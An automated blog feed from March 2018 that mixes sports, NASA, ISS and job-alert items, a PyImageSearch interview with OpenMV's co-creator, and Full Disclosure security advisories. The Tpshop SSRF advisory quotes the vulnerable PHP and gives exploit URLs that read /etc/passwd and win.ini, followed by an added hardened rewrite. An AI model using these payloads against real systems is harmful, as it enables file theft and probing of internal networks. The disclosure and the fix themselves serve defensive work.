
Saturday, March 31, 2018

Puss in Boots

Puss in Boots posters, canvas prints, framed pictures, postcards & more by Anonymous. Handmade in the UK.

from Google Alert - anonymous https://ift.tt/2H0E5DP
via IFTTT

How add email field to anonymous user's comment?

I want to give a permission to anonymous users to comment, however the default form does not include user's email. Can I manage, without contributed module, to create a comment form which user have to leave their email/name and notify me per each comment, as well? If need to install contributed ...

from Google Alert - anonymous https://ift.tt/2uCVPTh
via IFTTT

Twins' combined no-hitter broken up with 2 outs in 8th inning on single by Orioles' Jonathan Schoop (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

No-Hitter Watch: Twins' Kyle Gibson (6.0 IP) and Ryan Pressley have not allowed a hit through 7 innings vs. Orioles (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

No-Hitter Watch: Twins' Kyle Gibson has not allowed a hit through 6 innings vs. Orioles (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

Russian Hacker Who Allegedly Hacked LinkedIn and Dropbox Extradited to US

A Russian man accused of hacking LinkedIn, Dropbox, and Formspring in 2012 and possibly compromising personal details of over 100 million users, has pleaded not guilty in a U.S. federal court after being extradited from the Czech Republic. Yevgeniy Aleksandrovich Nikulin, 30, of Moscow was arrested in Prague on October 5, 2016, by Interpol agents working in collaboration with the FBI, but he


from The Hacker News https://ift.tt/2GF5Dkv
via IFTTT

Magna Carta

Magna Carta posters, canvas prints, framed pictures, postcards & more by Anonymous. Handmade in the UK.

from Google Alert - anonymous https://ift.tt/2H0ikV0
via IFTTT

Twilight in a Western Sky


A slender crescent Moon and inner planets Venus and Mercury never wander far from the Sun in planet Earth's skies. In the fading evening twilight of March 18, they line up near the western horizon in this atmospheric skyscape. While the celestial scene was enjoyed around the world, this photo captures the trio, with fainter Mercury at the far right, above the crags of Big Bend National Park in southwest Texas. Tonight the Moon will be full though, and rise opposite the Sun. Look for it high in the sky at midnight, near bright star Spica. via NASA https://ift.tt/2uAl3ls

Friday, March 30, 2018

Becoming anonymous on the internet and gaining back your freedom

Becoming anonymous on the internet and gaining back your freedom. Since the Facebook election campaign saga it seems thousands of people are getting more conscious about being more private on the internet, more articles are written about it every day. A few days ago @iamdylancurran wrote this ...

from Google Alert - anonymous https://ift.tt/2E8BkgK
via IFTTT

Re: [FD] new email; gw22067@hotmail.com | Double-free segfault bypass

[FD] Null Pointer Deference (Denial of Service)-Kingsoft Internet Security 9+ Kernel Driver KWatch3.sys

*****[ White Team Security (WTS) Security Advisory- ADV-01-03-2018 ]***** Kingsoft Internet Security 9+ - Null Pointer Deference Kernel Driver KWatch3.sys

Source: Gmail -> IFTTT-> Blogger

[FD] SSRF(Server Side Request Forgery) in Tpshop <= 2.0.6 (CVE-2017-16614)

# SSRF(Server Side Request Forgery) in Tpshop <= 2.0.6 (CVE-2017-16614)

The Tpshop open source mall system is a multi-merchant mode mall system developed by Shenzhen Leopard Network Co., Ltd. This system is based on the Thinkphp development framework.

## Product Download: http://www.tp-shop.cn/Index/Index/download.html

## Vulnerability Type: SSRF(Server Side Request Forgery)

## Attack Type: Remote

## Vulnerability Description

Tpshop’s former version 2.0.6 is vulnerable to SSRF(Server Side Request Forgery) in the fBill parameter within the "/plugins/payment/weixin/lib/WxPay.tedatac.php?fBil=" path. This vulnerability can lead to arbitrary files reading, network port scanning, information detection, internal network server attack.

The vulnerability code:

```php
if($_GET['fBill'] && $_GET['WxPayDataBase'])
{
    header('Content-type: image/jpeg');
    $handle = fopen($_GET['fBill'], 'r');
    fseek($handle , $_GET['WxPayDataBase']);
    fpassthru($handle);
}
```

## Exploit

http://tpshop_path/plugins/payment/weixin/lib/WxPay.tedatac.php?fBill=file:///c:/windows/win.ini&WxPayDataBase=test

modify the above fBill parameter, example:

- request http protocol: fBill=http://www.google.com
- request https protocol: fBill=https://www.google.com
- request ftp protocol: fBill=ftp://www.google.com
- file read: fBil=file:///etc/passwd or fBil=file:///c:/windows/win.ini

## Versions

Tpshop <= 2.0.6

## Impact

SSRF(Server Side Request Forgery) in Tpshop before version 2.0.6 allow remote attackers to arbitrary files read, scan network port, information detection, internal network server attack.

## Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)

## References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16614

service@baimaohui.net

Source: Gmail -> IFTTT-> Blogger
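
A hardened form of the handler quoted in the Tpshop advisory above, added here as an example; it is not part of the advisory or of Tpshop's code. It assumes the endpoint only needs to serve JPEG files from one local directory, and `BILL_DIR`, `resolve_bill_path()`, `parse_offset()` and `serve_bill()` are hypothetical names.

```php
<?php
declare(strict_types=1);

// Hypothetical storage directory (assumption): the advisory does not say
// what the endpoint was meant to serve.
const BILL_DIR = '/var/www/tpshop/runtime/bills';

/** Map a caller-supplied name to a regular file inside $baseDir, or null. */
function resolve_bill_path(string $name, string $baseDir): ?string
{
    // Bare file name only: no scheme ("file://", "http://"), no path
    // separators, no "..". fopen() therefore never sees a URL wrapper.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.jpe?g\z/', $name) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks, so a link planted in the directory
    // cannot point the handler outside it.
    $prefix = $base . DIRECTORY_SEPARATOR;
    $path = realpath($prefix . $name);
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

/** Accept the offset only as a short decimal string that lies within the file. */
function parse_offset(string $raw, int $size): ?int
{
    if (preg_match('/\A[0-9]{1,10}\z/', $raw) !== 1) {
        return null;
    }
    $offset = (int) $raw;
    return $offset <= $size ? $offset : null;
}

/** Replacement for the quoted handler; returns the HTTP status it sent. */
function serve_bill(array $query, string $baseDir = BILL_DIR): int
{
    $name = $query['fBill'] ?? null;
    $rawOffset = $query['WxPayDataBase'] ?? '0';
    // Array-valued parameters (fBill[]=...) are rejected here as well.
    if (!is_string($name) || !is_string($rawOffset)) {
        http_response_code(400);
        return 400;
    }
    $path = resolve_bill_path($name, $baseDir);
    $size = $path === null ? false : filesize($path);
    if ($path === null || $size === false) {
        http_response_code(404);
        return 404;
    }
    $offset = parse_offset($rawOffset, $size);
    if ($offset === null) {
        http_response_code(400);
        return 400;
    }
    $handle = fopen($path, 'rb');
    if ($handle === false) {
        http_response_code(404);
        return 404;
    }
    header('Content-Type: image/jpeg');
    header('X-Content-Type-Options: nosniff');
    fseek($handle, $offset);
    fpassthru($handle);
    fclose($handle);
    return 200;
}

if (PHP_SAPI === 'cli') {
    // Constructed self-check: the fBill values listed in the advisory, one
    // traversal attempt and one legitimate name, against a temporary directory.
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'bill_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'invoice_1.jpg', 'constructed sample bytes');
    $probes = [
        'file:///etc/passwd',
        'http://www.google.com',
        'ftp://www.google.com',
        '../../etc/passwd',
        'invoice_1.jpg',
    ];
    foreach ($probes as $probe) {
        $verdict = resolve_bill_path($probe, $dir) === null ? 'rejected' : 'accepted';
        printf("%-28s %s\n", $probe, $verdict);
    }
    unlink($dir . DIRECTORY_SEPARATOR . 'invoice_1.jpg');
    rmdir($dir);
} else {
    serve_bill($_GET);
}
```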

[FD] APPLE-SA-2018-3-29-8 iCloud for Windows 7.4


Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-7 iTunes 12.7.4 for Windows


Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-6 Safari 11.1


Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-5 macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan


Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-4 Xcode 9.3


Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-3 tvOS 11.3


Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-2 watchOS 4.3


Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2018-3-29-1 iOS 11.3


Source: Gmail -> IFTTT-> Blogger

[FD] Multiple Cross-Site Scripting Vulnerabilities in Crea8Social Social Network Script

[FD] CVE-2018-5708

Hello Seclists: Attached is my writeup for the following CVE: CVE-2018-5708 > An issue was discovered on D-Link DIR-601 B1 2.02NA devices. Being on > the same local network as, but being unauthenticated to, the > administrator's panel, a user can obtain the admin username and > cleartext password in the response (specifically, the configuration > file restore_default), which is displayed in XML. > >

Source: Gmail -> IFTTT-> Blogger

[FD] CA20180328-01: Security Notice for CA API Developer Portal


Source: Gmail -> IFTTT-> Blogger

[FD] CA20180329-01: Security Notice for CA Workload Automation AE and CA Workload Control Center


Source: Gmail -> IFTTT-> Blogger

Free-agency grades: Ravens get a B- after signings of WRs John Brown, Michael Crabtree - Jamison Hensley (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

Law360's Satisfaction Survey

Welcome to Law360's anonymous survey on career and life satisfaction. The following questions touch on your financial, physical and mental well-being. All answers and data will remain anonymous. The survey will take approximately 10 minutes to complete. Thank you for your time and participation.

from Google Alert - anonymous https://ift.tt/2GVCOhl
via IFTTT

Farm supervisor

Apply for the Farm supervisor - kajiado vacancy at Anonymous Employer today! Subscribe to alerts to receive similar jobs directly to your email.

from Google Alert - anonymous https://ift.tt/2uy33rU
via IFTTT

Thursday, March 29, 2018

▶ Adam Jones smacks 11th-inning walk-off homer in Orioles' 3-2 win over Twins (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

Anonymous

Anonymous posters, postcards, canvas prints & framed pictures. Available to buy online. 100% Handmade artist prints you'll love.

from Google Alert - anonymous https://ift.tt/2uw02rX
via IFTTT

Messrs. Maskelyne and Cooke from England's home of mystery

Messrs. Maskelyne and Cooke from England's home of mystery posters, canvas prints, framed pictures, postcards & more by Anonymous. Handmade in the UK.

from Google Alert - anonymous https://ift.tt/2GkPLo8
via IFTTT

Microsoft's Meltdown Patch Made Windows 7 PCs More Insecure

Meltdown CPU vulnerability was bad, and Microsoft somehow made the flaw even worse on its Windows 7, allowing any unprivileged, user-level application to read content from and even write data to the operating system's kernel memory. For those unaware, Spectre and Meltdown were security flaws disclosed by researchers earlier this year in processors from Intel, ARM, and AMD, leaving nearly


from The Hacker News https://ift.tt/2Gyjzgn
via IFTTT

ISS Daily Summary Report – 3/28/2018

68 Progress (68P) Undock: 68P successfully undocked from the Docking Compartment 1 (DC-1) port this morning at 8:50 AM CDT. This Progress vehicle will conduct Non-ISS free-flight experiments from April 3 to April 24. A series of burns scheduled for Thursday March 29 and April 2 will place the vehicle into the required orbit. The … Continue reading "ISS Daily Summary Report – 3/28/2018"

from ISS On-Orbit Status Report https://ift.tt/2GDsL2Q
via IFTTT

Apple macOS Bug Reveals Passwords for APFS Encrypted Volumes in Plaintext

A severe programming bug has been found in APFS file system for macOS High Sierra operating system that exposes passwords of encrypted external drives in plain text. Introduced two years ago, APFS (Apple File System) is an optimized file system for flash and SSD-based storage solutions running MacOS, iOS, tvOS or WatchOS, and promises strong encryption and better performance.


from The Hacker News https://ift.tt/2E2Rx7e
via IFTTT

NGC 2023 in the Horsehead's Shadow


Carved by a bright young star in Orion's dusty molecular clouds, NGC 2023 is often overlooked in favor of the nearby dramatic silhouette of the Horsehead Nebula. In its own right it is seen as a beautiful star forming emission and reflection nebula though, a mere 1500 light-years distant. Surprisingly colorful and complex filaments are detailed in this rare NGC 2023 portrait. Scattered points of emission are also from the region's Herbig-Haro objects, associated with the energetic jets from newborn stars. The sharp telescopic view spans about 10 light-years at the estimated distance of NGC 2023. Off the right edge of the frame lies the more familiar cosmic Horsehead. via NASA https://ift.tt/2GREmZP

Wednesday, March 28, 2018

📈 MLB Power Rankings: Orioles No. 20 to begin 2018 season (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

ISS Daily Summary Report – 3/27/2018

Extravehicular Activity (EVA) Preparations:  Today the crew continued preparing for US EVA #49 – Node 3 External Wireless Communications (EWC) installation, planned for Thursday March 29, 2018. They completed additional Airlock and Extravehicular Mobility Unit (EMU) configuration and performed an EMU Water Tank and Liquid Cooling Ventilation Garment (LVCG) Water Fill.  Television Camera Interface Converter … Continue reading "ISS Daily Summary Report – 3/27/2018"

from ISS On-Orbit Status Report https://ift.tt/2GDfszx
via IFTTT

Will the Ravens draft a QB? We rate all 32 teams' chances of selecting a signal-caller (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

An interview with Kwabena Agyeman, co-creator of OpenMV and microcontroller expert

After publishing last week’s blog post on reading barcodes with Python and OpenMV, I received a lot of emails from readers asking questions about embedded computer vision and how microcontrollers can be used for computer vision.

Instead of trying to address these questions myself, I thought it would be best to bring in a true expert — Kwabena Agyeman, co-founder of OpenMV, a small, affordable, and expandable embedded computer vision device.

Kwabena is modest in this interview and denies being an expert (a true testament to his kind character and demeanor), but trust me, meeting him and chatting with him is a humbling experience. His knowledge of embedded programming and microcontroller design is incredible. I could listen to him talk about embedded computer vision all day.

I don’t cover embedded devices here on PyImageSearch often so it’s a true treat to have Kwabena here today.

Join me in welcoming Kwabena Agyeman to the PyImageSearch blog. And to learn more about embedded computer vision, just keep reading.


Figure 1: The OpenMV camera is a powerful embedded camera board that runs MicroPython.

Adrian: Hey Kwabena, thanks for doing this interview! It’s great to have you on the PyImageSearch blog. For people who don’t know you and OpenMV, who are you and what do you do?

Kwabena: Hi Adrian, thanks for having me in today. Me and my co-founder Ibrahim created the OpenMV Cam and run the OpenMV project.

OpenMV is a focused effort on making embedded computer/machine vision more accessible. The ultimate goal of the project is to enable machine-vision in more embedded devices than there are today.

For example, let’s say you want to add a face detection sensor to your toaster. This is probably overkill for any application, but, bear with me.

First, you can’t just go out today and buy a $50 face detection sensor. Instead, you’re looking at least setting up a Single-Board-Computer (SBC) Linux system running OpenCV. This means adding face detection to your toaster now just became a whole new project.

If your goal was to just detect if there’s a face in view or not, and then toggle a wire to release the toast when you look at the toaster you don’t necessarily want to go down the SBC path.

Instead, what you really want is a microcontroller that can accomplish the goal of detecting faces out-of-the-box and toggling a wire with minimal setup.

So, the OpenMV project is basically about proving high-level machine-vision functionality out of the box for a variety of tasks to developers who want to add powerful features to their projects without having to focus on all the details.


Figure 2: The CMUcam4 is a fully programmable embedded computer vision sensor developed by Kwabena Agyeman while at Carnegie Mellon University.

Adrian: That’s a great point regarding having to set up a SBC Linux system, install OpenCV, and write the code, just to achieve a tiny bit of functionality. I don’t do much work with embedded devices so it’s insightful seeing it from a different perspective. What inspired you to start working in the computer vision, machine learning, and the embedded field?

Kwabena: Thanks for asking Adrian, I got into machine-vision back at Carnegie Mellon University working under Anthony Rowe who created the CMUcam 1, 2, and 3. While I was a student there I created the CMUcam 4 for simple color tracking applications.

While limited, the CMUcams were able to do their jobs of tracking colors quite well (if deployed in a constant lighting environment). I really enjoyed working on the CMUcam4 because it blended board design, microcontroller programming, GUI development, and data-visualization in one project.


Figure 3: A small, affordable, and expandable embedded computer vision device.

Adrian: Let’s get into more detail about OpenMV and the OpenMV Cam. What exactly is OpenMV Cam and what is it used for?

Kwabena: So, the OpenMV Cam is a low-powered machine-vision camera. Our current model is the OpenMV Cam M7 which is powered by a 216 MHz Cortex-M7 processor that can execute two-instructions per clock making it about half as fast (single-threaded no-SIMD) compute-wise as the Raspberry Pi zero.

The OpenMV Cam is also a MicroPython board. This means you program it in Python 3. Note that this doesn’t mean desktop python libraries are available. But, if you can program in Python you can program the OpenMV Cam and you’ll feel at home using it.

What’s cool though is that we’ve built a number of high-level machine-vision algorithms into the OpenMV Cam’s firmware (which is written in C — python is just to allow you to glue vision logic together like you do with OpenCV’s python library bindings).

In particular, we’ve got:

  • Multi-color blob tracking
  • Face detection
  • AprilTag tracking
  • QR Code, Barcode, Data Matrix detection and decoding
  • Template matching
  • Phase-correlation
  • Optical-flow
  • Frame differencing
  • and more built-in.

Basically, it’s like OpenCV on a low-power microcontroller (runs off a USB port) with Python bindings

Anyway, our goal is to wrap up as much functionality into easy-to-use function calls as possible. For example, we have a “find_blobs()” method which returns a list of color blob objects in the image. Each blob object has a centroid, bounding box, pixel count, rotation angle, etc. So, the function call automatically segments an image (RGB or Grayscale) by a list of color-thresholds, finds all blobs (connected components), merges overlapping blobs based on their bounding boxes, and additionally calculates each blob’s centroid, rotation angle, etc. Subjectively, using our “find_blobs()” is a lot more straightforward than finding color blobs with OpenCV if you’re a beginner. That said, our algorithm is also less flexible if you need to do something we didn’t think of. So, there’s a trade-off.

Moving on, sensing is just one part of the problem. Once you detect something you need to act. Because the OpenMV Cam is a microcontroller you can toggle I/O pins, control SPI/I2C buses, send UART data, control servos, and more all from the same script you’ve got your vision logic in. With the OpenMV Cam you sense, plan, and act all from one short python script.


Adrian: Great explanation. Can you elaborate more on the target market for the OpenMV? If you had to describe your ideal end user who absolutely had to have an OpenMV, who would they be?

Kwabena: Right now we’re targeting the hobbyist market with the system. Hobbyists have been our biggest buyers so far and helped us sell over five thousand OpenMV Cam M7s last year. We’ve also got a few companies buying the cameras too.

Anyway, as our firmware gets more mature we hope to sell more cameras to more companies building products.

Right now we’re still rapidly building out our firmware functionality to more or less complement OpenCV for basic image processing functionality. We’ve already got a lot of stuff on board but we’re trying to make sure you have any tool you need like shadow removal with inpainting for creating a shadow free background frame differencing applications.


Figure 4: An example of AprilTags (Image credit: MIT).

Adrian: Shadow removal, that’s fun. So, what was the most difficult feature or aspect that you had to wrangle with when putting together OpenMV?

Kwabena: Porting AprilTags to the OpenMV Cam was the most challenging algorithm to get running onboard.

I started with the AprilTag 2 source code meant for the PC. To get it running on the OpenMV Cam M7, which has only 512 KB of RAM versus a desktop PC, I had to go through all 15K+ lines of code and redo how memory allocations worked to be more efficient.

Sometimes this was as simple as moving large array allocations from malloc to a dedicated stack. Sometimes I had to change how some algorithms worked to be more efficient.

For example, AprilTags computes a lookup table of every possible hamming code word with 0, 1, 2, etc. bit errors when trying to match detected tag bit patterns with a tag dictionary. This lookup-table (LUT) can be over 30 MBs for some tag dictionaries! Sure, indexing a LUT is fast, but, a linear search through the tag dictionaries for a matching tag can work too.

Anyway, after porting the algorithm to the OpenMV Cam M7 it can run AprilTags at 160×120 at 12 FPS. This lets you detect tags printed on 8”x11” paper from about 8” away with a microcontroller which can run off of your USB port.


Adrian: Wow! Having to manually go through all 15K lines of code and re-implement certain pieces of functionality must have been quite the task. I hear there are going to be some really awesome new OpenMV features in the next release. Can you tell us about them?

Kwabena: Yes, our next product, the OpenMV Cam H7 powered by the STM32H7 processor will double our performance. In fact, its coremark score is on par with the 1 GHz Raspberry Pi zero (2020.55 versus 2060.98). That said, the Cortex-M7 core doesn’t have NEON or a GPU. But, we should be able to keep up for CPU limited algorithms.

However, the big feature add is removable camera module support. This allows us to offer the OpenMV Cam H7 with an inexpensive rolling shutter camera module like we do now. But, for more professional users we’ll have global shutter options for folks who are trying to do machine vision in high speed applications like taking pictures of products moving on a conveyor belt. Better yet, we’re also planning to support FLIR Lepton Thermal sensors for machine vision too. Best of all, each camera module will use the same “sensor.snapshot()” construct we use to take pictures now allowing you to switch out one module for another without changing your code.

Finally, thanks to ARM, you can now run neural networks on the Cortex-M7. Here’s a video of the OpenMV Cam running a CIFAR-10 network onboard:

We’re going to be building out this support for the STM32H7 processor so that you can run NN’s trained on your laptop to do things like detecting when people enter rooms and etc. The STM32H7 should be able to run a variety of simple NN’s for lots of common detection task folks want for an embedded system to do.

We’ll be running a KickStarter for the next generation OpenMV Cam this year. Sign-up on our email list here and follow us on Twitter to stay up-to-date for when we launch the KickStarter.


Adrian: Global shutter and thermal imaging support is awesome! Theoretically, could I turn an OpenMV Cam with a global shutter sensor into a webcam for use with my Raspberry Pi 3? Inexpensive global shutter sensors are hard to find.

Kwabena: Yes, the OpenMV Cam can be used as a webcam. Our USB speed is limited to 12 Mb/s though, so, you’ll want to stream JPEG compressed images. You can also connect the OpenMV Cam to your Raspberry Pi via SPI for a faster 54 Mb/s transfer rate. Since the STM32H7 has a hardware JPEG encoder onboard now the OpenMV Cam H7 should be able to provide a nice high FPS precisely triggered frame stream to your Raspberry Pi.


Figure 5: Using OpenMV to build DIY robocar racers.

Adrian: Cool, let’s move on. One of the most exciting aspects of developing a new tool, library, or piece of software is to see how your work is used by others. What are some of the more surprising ways you’ve seen OpenMV used?

Kwabena: For hobbyists our biggest feature has been color tracking. We do that very well at above 50 FPS with our current OpenMV Cam M7. I think this has been the main attraction for a lot of customers. Color tracking has historically been the only thing you were able to do on a microcontroller so it makes sense.

QR Code, Barcode, Datamatrix, and AprilTag support have also been selling points.

For example, we’ve had quadcopter folks start using the OpenMV Cam to point down at giant AprilTags printed out on the ground for precision landing. You can have one AprilTag inside of another one and as the quadcopter gets closer to the ground the control algorithm tries to keep the copter centered on the tag in view.

However, what’s tickled me the most is doing DIY Robocar racing with the OpenMV Cam and having some of my customers beat me in racing with their OpenMV Cams.


Adrian: If PyImageSearch readers would like to get their own OpenMV camera, where can they purchase one?

Kwabena: We just finished another production run of 2.5K OpenMV Cams and you can buy them online on our webstore now. We’ve also got lens accessories, shields for controlling motors, and more.


Adrian: Most people don’t know this, but you and I ran a Kickstarter campaign at the same time back in 2015! Mine was for the PyImageSearch Gurus course while yours was for the initial release and manufacturing of the OpenMV Camera. OpenMV’s Kickstarter easily beat my own, which just goes to show you how interested the embedded community was in the product — fantastic job and congrats on the success. What was running your first Kickstarter campaign like?

Kwabena: Running that KickStarter campaign was stressful. We’ve come a long, long, long way since then. I gave a talk on this a few years back which more or less summarizes my experience:

Anyway, it’s a lot of work and a lot of stress.

For our next KickStarter we’re trying to prepare as much as possible beforehand so it’s more of a turnkey operation. We’ve got our website, online-shop, forums, documentation, shipping, etc. all setup now so we don’t have to build the business and the product at the same time anymore. This will let us focus on delivering the best experience for our backers.


Adrian: I can attest to the fact that running a Kickstarter campaign is incredibly stressful. It’s easily a full-time job for ~3 months as you prepare the campaign, launch it, and fund it. And once it’s funded you then need to deliver on your promise! It’s a rewarding experience and I wouldn’t discourage others from doing it, but be prepared to be really stressed out for 3-4 months. Shifting gears a bit, as an expert in your field, who do you talk to when you get “stuck” on a hard problem?

Kwabena: I wouldn’t say I’m an expert. I’m learning computer vision like everyone else. Developing the OpenMV Cam has actually been a great way to learn how algorithms work. For example, I learned a lot porting the AprilTag code. There’s a lot of magic in that C code. I’m also quite excited actually to now start adding more machine learning features to the OpenMV Cam using the ARM CMSIS NN library for the Cortex-M7.

Anyway, to answer where I go for help… The internet! And research papers! Lots of research papers. I do the reading so my OpenMV Cam users don’t have to.


Adrian: From your LinkedIn I know you have a lot of experience in hardware design languages. What advice do you have for programmers interested in using FPGAs for computer vision?

Kwabena: Hmm… You can definitely get a lot of performance out of FPGAs. However, it’s definitely a pay-to-play market. You’re going to need some serious budget to get access to any of the high-end hardware and/or intellectual property. That said, if you’ve got an employer willing to spend there’s a lot of development going on that will allow you to run very large deep neural networks on FPGAs. It’s definitely sweet to get a logic pipeline up and running that’s able to process gigabytes of data a second.

Now, there’s also a growing medium-end FPGA market that’s affordable to play in if you don’t have a large budget. Intel (previously Altera) has an FPGA called the Cyclone for sale that’s more or less affordable if you’re willing to pay for the hardware. You can interface the Cyclone to your PC via PCIe using Xillybus IP which exposes FIFOs on your FPGA as linux device files on your PC. This makes it super easy to move data over to the FPGA. Furthermore, Intel offers DDR memory controller IP for free so you can get some RAM buffers up and running. Finally, you just need to add a camera module and you can start developing.

But… that said, you’re going to run into a rather unpleasant brick wall on how to write verilog code and having to pay for the tool chains. The hardware design world is not really open source, nor will you find lots of stack overflow threads about how to do things. Did I mention there’s no vision library for hardware available? Gotta roll everything yourself!


Adrian: When you’re not working at OpenMV, you’re at Planet Labs in San Francisco, CA, which is where PyImageConf, PyImageSearch’s very own computer vision and deep learning conference will be held. Will you be at PyImageConf this year (August 26-28th)? The conference will be a great place to show off OpenMV functionality. I know attendees would enjoy it.

Kwabena: Yes, I’ll be in town and present for the conference. I live in SF now.


Adrian: Great to hear! If a PyImageSearch reader wants to chat, what is the best place to connect with you?

Kwabena: Email us at openmv@openmv.io or comment on our forum. Additionally, please follow us on Twitter, our YouTube channel, and sign-up on our mailing list.

Summary

In today’s blog post I interviewed Kwabena Agyeman, co-founder of OpenMV.

If you have any questions for Kwabena, be sure to leave a comment on this post! Kwabena is a regular PyImageSearch reader and is active in the comments.

And if you enjoyed today’s post and want to be notified when future blog posts are published here on PyImageSearch, be sure to enter your email address in the form below!

The post An interview with Kwabena Agyeman, co-creator of OpenMV and microcontroller expert appeared first on PyImageSearch.



from PyImageSearch https://ift.tt/2GhHL2Y
via IFTTT

Quick Tip



from Google Alert - anonymous https://ift.tt/2GenAaq
via IFTTT

Tuesday, March 27, 2018

I have a new follower on Twitter


Nimbus XYZ
Follow a cloud-focused accountant for advice on how to get your #business #online using #cloud #technology and increase #productivity in your business!
Washington, DC
https://t.co/hjJ3GheFfB
Following: 3541 - Followers: 2855

March 27, 2018 at 03:13PM via Twitter http://twitter.com/nimbus_xyz

Re: [FD] new email; gw22067@hotmail.com | Double-free segfault bypass

Re: [FD] new email; gw22067@hotmail.com | Double-free segfault bypass

[FD] new email; gw22067@hotmail.com | Double-free segfault bypass

[FD] DSA-2018-040: RSA® Authentication Agent for Web for IIS and Apache Web Server Multiple Vulnerabilities


Source: Gmail -> IFTTT-> Blogger

[FD] DSA-2018-058: Dell EMC ScaleIO Multiple Security Vulnerabilities


Source: Gmail -> IFTTT-> Blogger

[FD] ManageEngine Service Desk Plus < 9403 Cross-Site Scripting

[FD] Blind SQL Injection in Square 9 GlobalForms <= 6.2.x (CVE-2018-8820)

I have a new follower on Twitter


AdvancedMD
Cloud software for independent medical practices that delivers industry-leading patient outcomes & financial performance. #MedicalBilling #EHR #Telemedicine
Salt Lake City
https://t.co/IqOYUqga76
Following: 9158 - Followers: 15279

March 27, 2018 at 01:13PM via Twitter http://twitter.com/advancedmd

📉 NFL Power Rankings: Ravens fall five spots to No. 24 after initial surge of free agency (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/26/2018

Lab Major Constituent Analyzer (MCA) Status: The Lab MCA 72 hour dryout completed period ended on Friday 23 March. This weekend, telemetry indicated that the water readings were too high to proceed with a successful activation and calibration. As of this morning, the water readings were no longer off-scale high; however they were too high … Continue reading "ISS Daily Summary Report – 3/26/2018"

from ISS On-Orbit Status Report https://ift.tt/2GddQsN
via IFTTT

[FD] Microsoft Skype Mobile v81.2 & v8.13 - Remote Denial of Service Vulnerability

Document Title:
===============
Microsoft Skype Mobile v81.2 & v8.13 - Remote Denial of Service Vulnerability

References (Source):
====================
https://ift.tt/2n1hu0y

Video: https://ift.tt/2ISY6wG

MSRC ID: 43520  CRM:0461036906

Acknowledgements: https://ift.tt/2Gw0BGV

Release Date:
=============
2018-03-27

Vulnerability Laboratory ID (VL-ID):
====================================
2116

Common Vulnerability Scoring System:
====================================
4.7

Vulnerability Class:
====================
Denial of Service

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Skype is a telecommunications application software product that specializes in providing video chat and voice calls between computers, tablets, mobile devices, the Xbox One console, and smartwatches via the Internet and to regular telephones. Skype additionally provides instant messaging services. Users may transmit both text and video messages, and may exchange digital documents such as images, text, and video. Skype allows video conference calls.

(Copy of the Homepage: https://ift.tt/1nU1neS )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a denial of service vulnerability in the official microsoft skype v8.12 and v8.13 mobile software clients for apple ios or google android.

Vulnerability Disclosure Timeline:
==================================
2018-02-01: Researcher Notification & Coordination (Security Researcher)
2018-02-03: Vendor Notification (Microsoft Security Response Center)
2018-02-08: Vendor Response/Feedback (Microsoft Security Response Center)
2018-03-20: Vendor Fix/Patch (Microsoft Service Developer Team)
2018-03-25: Vendor Fix/Patch (Security Acknowledgements)
2018-03-27: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Coordinated Disclosure

Technical Details & Description:
================================
A remote denial of service vulnerability has been discovered in the official microsoft skype v8.12 and v8.13 mobile software clients for apple ios or google android. The denial of service web vulnerability allows attackers to crash the skype application by transmitting malformed message content.

The vulnerability is located in the function to convert the size of transferred images when displaying. When transferring an image from the skype windows software client (computer system) to the mobile skype clients (iOS & android), a memory error occurs when adapting the smilie graphics. Attackers can copy the incorrectly formatted smilie by quote from the message, which is sent in broken format with a permanent resize request. The attackers can then transfer the copied smilie into conversations to crash it with a memory error. When transferring the smilies by quote or by copying, the harmful content can be transferred to other input fields, which then also cause a local memory error on display.

The demo video demonstrates how an attacker can use the content locally to crash himself or other Skype clients like Samsung's. The memory error can be used locally and remotely, but it is not possible to overwrite active registers from the process to compromise them permanently.

The exploit of the vulnerability leads to crashes, massive sync problems and untreated memory errors in the mobile Skype iOS & Android software client. Skype for windows, linux & macos operating systems are not affected by the issue but must be used to bring the malicious content to the mobile skype client message board.

Proof of Concept (PoC):
=======================
The vulnerability can be reproduced by local or remote attackers without user interaction and with a low privileged skype user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Setup a windows 10 default system and install skype v7.40.0.151
2. Setup a mobile iOS device and install the latest skype v8.12.0.14 & v8.13
3. Now open the windows 10 skype client and add the contact of the mobile device
4. Open the mobile device and confirm the user add request
